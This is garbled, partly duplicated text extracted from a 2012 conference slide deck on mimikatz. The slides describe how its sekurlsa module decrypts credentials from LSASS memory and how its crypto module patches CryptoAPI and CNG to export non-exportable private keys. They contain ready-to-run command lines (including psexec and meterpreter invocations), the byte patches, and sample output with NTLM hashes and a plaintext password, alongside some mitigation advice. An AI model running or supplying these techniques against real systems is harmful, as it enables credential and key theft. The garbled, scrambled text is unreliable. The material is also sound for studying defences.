mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4 4
mimikatzexe
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo mod_mimikatz_nogpo
mod_mimikatz_divers mod_mimikatz_divers
mod_mimikatz_winmine mod_mimikatz_winmine
mod_mimikatz_impersonate mod_mimikatz_impersonate
mod_mimikatz_inject mod_mimikatz_inject
mod_mimikatz_samdump mod_mimikatz_samdump
mod_mimikatz_standard mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle mod_mimikatz_handle
mod_mimikatz_system mod_mimikatz_system
mod_mimikatz_service mod_mimikatz_service
mod_mimikatz_process mod_mimikatz_process
mod_mimikatz_thread mod_mimikatz_thread
mod_mimikatz_terminalserver mod_mimikatz_terminalserver
mod_mimikatz_privilege mod_mimikatz_privilege
mod_pipe mod_pipe
mod_inject mod_inject
mod_memory mod_memory
mod_parseur mod_parseur
mod_patch mod_patch
mod_hive mod_hive
mod_secacl mod_secacl
mod_privilege mod_privilege
mod_process mod_process
mod_service mod_service
mod_system mod_system
mod_thread mod_thread
mod_ts mod_ts
mod_text mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0 msv_1_0
tspkg tspkg
wdigest wdigest
livessp livessp
kerberos kerberos
kappfreedll kappfreedll
kelloworlddll kelloworlddll
klockdll klockdll
mimikatzsys mimikatzsys
sekurlsadll
sam sam
secrets secrets
msv_1_0 msv_1_0
wdigest wdigest
livessp livessp
kerberos kerberos
tspkg tspkg
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
